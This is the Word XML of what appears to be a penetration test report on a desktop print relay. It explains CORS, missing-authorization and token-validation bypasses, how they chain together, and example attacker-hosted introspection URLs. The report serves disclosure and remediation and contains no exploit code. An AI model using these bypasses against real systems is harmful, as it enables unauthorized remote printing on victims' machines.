        <w:t>Picture 4 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>F3) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A second print endpoint has no authorization check at all; it confirms a header was filled in, never that the caller is genuine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E45B6" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA52A0F" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 5 — F1: The Fake ID-Check (Attacker-Controlled Token Validation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B8493" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t xml:space="preserve">F1 is the most instructive bug in the whole report. The relay validates the login token by contacting a checking service whose address the attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>supplies, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then accepts the answer without really reading it. The only guard is a substring search for the text 'okta' in that attacker-supplied address. Worse, when the response comes back, the relay decides the token is valid </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>as long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no error field is present — it never checks whether the token is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually active</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6929D072" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="282828"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>What the binary shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E857A" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>isUserTokenValid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> guards the attacker-supplied URL with only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>IndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">("okta", </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>...) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> any URL containing that text passes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C3478E" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Validity is decided by the absence of an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ErrorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> field; the Active field is NEVER checked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699CC8D5" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The response object (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OktaIntrospectResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) literally has an Active property — they had the right field available and did not use it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED180B3" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419BC2AE" wp14:editId="0F88731E">
            <wp:extent cx="6035040" cy="4169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xec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6035040" cy="4169664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06432D65" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Picture 5 (F1) — The relay trusts an attacker-supplied “checking service” and accepts an empty reply as success, never verifying the token is active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A31316A" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41926A" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6 — F2: The Self-Signed Pass (Attacker-Controlled Key Directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9ABD5A" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t>F2 is the same root mistake as F1, in a second code path. When the first check does not match, the relay falls through to a B2C validation path that derives its trust — the issuer and the signing keys — from input the attacker influences. If you control the directory that lists which signing keys are 'trusted,' you can list your own key and sign your own valid-looking pass. Because F1 and F2 share a cause and F1 leads directly into F2, they are fixed together as one change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F2586" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="282828"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>What the binary shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562F5ADF" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>isUserTokenValid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> falls through to IsB2CTokenValid — the call is present in the binary, confirming the two-path design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE0B01" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The B2C path anchors trust to attacker-influenced input rather than to fixed, server-side configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B91815" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00B4FA94" wp14:editId="39FDA77A">
            <wp:extent cx="6035040" cy="4169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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6035040" cy="4169664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD94B4" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Picture 6 (F2) — A second validation path trusts an attacker-hosted directory of “trusted” keys, so the attacker can sign a pass that validates against their own key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9E8446" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="084544D4" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 7 — Putting It Together: The Complete Attack Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E32DC" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t xml:space="preserve">Individually, these are four defects. Together, they are one attack. This final picture assembles them in the order an attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually uses</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> them. The most important thing to understand — and the thing that changes how the fix must be planned — is that the three authentication bypasses are joined by OR. The attacker needs only ONE of them. That means fixing F1 by itself accomplishes nothing while F3 stays open. To close the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>chain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you must fix the delivery vector (F4) AND all three doors (F1, F2, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>F3) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ideally by routing every print path through one shared, correct authorization gate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A20473" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="530ED780" wp14:editId="7B6E292E">
            <wp:extent cx="6583680" cy="4778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chain.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6583680" cy="4778477"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C91AA82" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Picture 7 — The complete chain. Delivery (F4) → optional recon (M6) → ANY ONE of three bypasses (F3 / F1 / F2) → unauthorized printing, with routing-map tampering (M5) as an alternative payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B472B73" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A95AC" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Four Sentences to Remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622CB87B" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:t>If you take nothing else from these pictures, take these:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE2E15" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>F4 is the way in. Permissive CORS lets any website reach a service that should only hear from the approved app — turning a local issue into a remote, click-driven one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2ACEF1" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>F3 is the door with no lock. One print path validates nothing; a plain request prints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E51E24B" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">F1 and F2 are broken ID-checks. The relay trusts a checking service, and the keys behind it, that the attacker controls — and never verifies the token is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>actually active</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56634311" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>It is a chain joined by OR. Fixing one bypass changes nothing while another stays open; the delivery vector and all three doors must be fixed together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910CBB4" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258"/>
    <w:p w14:paraId="54637AC7" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00C62258">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Every detail in this walkthrough was verified against the application binary (DesktopPrintRelayService.Host.exe). For the full technical evidence, code locations, and step-by-step remediation, see the main penetration test report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4EB61B" w14:textId="0810C7AF" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77ABBBE0" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3100BC97" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05AC5D8A" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE47712" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D54BA9" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5387A6A0" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A9C07B" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9AD441" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDC4F1B" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1D4F1A" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4851D24D" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBFE4B7" w14:textId="77777777" w:rsidR="00C62258" w:rsidRDefault="00C62258" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0DE304" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00FD238A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rP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6BCFAB2" w14:textId="77777777" w:rsidTr="002048E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33EE5466" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="_Toc9000001"/>
            <w:bookmarkStart w:id="6" w:name="_Toc232079910"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>1. Authentication Bypass via Attacker-Controlled Token Introspection URL - High</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5"/>
            <w:bookmarkEnd w:id="6"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5928A133"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AEA37FD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267296AA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Rating: </w:t>
      </w:r>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 8.8 (</w:t>
      </w:r>
      <w:r>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150AC29D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected component: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DesktopPrintRelayService.Host.exe v1.0.0.5 — PrintController.isUserTokenValid; endpoints </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>POST /printers/print/pdfWithCopies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>printers/{printDocType}/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>print/zpl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D8C61E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The relay validates the bearer token supplied by the calling web application by performing an OAuth2/Okta token-introspection call. The URL of that introspection endpoint is taken directly from the caller-supplied request header X-ProviderValidationUrl. The only validation performed on this attacker-controlled URL is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that the literal substring "okta" appears in it. This is trivially satisfied by an attacker-hosted URL such as https://okta.attacker.example/introspect or https://evil.example/okta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3558E0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The defect is compounded by the success criteria. After issuing the request, the code deserializes the JSON response and treats the token as VALID whenever the response simply lacks an error field. It never checks that the introspection "active" claim is true, nor does it validate issuer, audience, client_id, or expiry. As a result, an attacker who stands up any HTTPS endpoint whose URL contains "okta" and returns a body with no error field (for example, an empty JSON object) will have any token value they supply accepted as valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9F330A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because the service applies a permissive Cross-Origin Resource Sharing policy (see related finding), this bypass is reachable </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cross</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-origin from any website the authenticated user visits; the loopback-bound listener is contacted from the victim's browser. The net effect is that the entire authorization model protecting document printing on the workstation can be defeated by an unauthenticated, remote attacker, allowing arbitrary content to be printed to the user's mapped printers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5275B9CF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966165D" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Code Source Tracking</w:t>
      </w:r>
    </w:p>
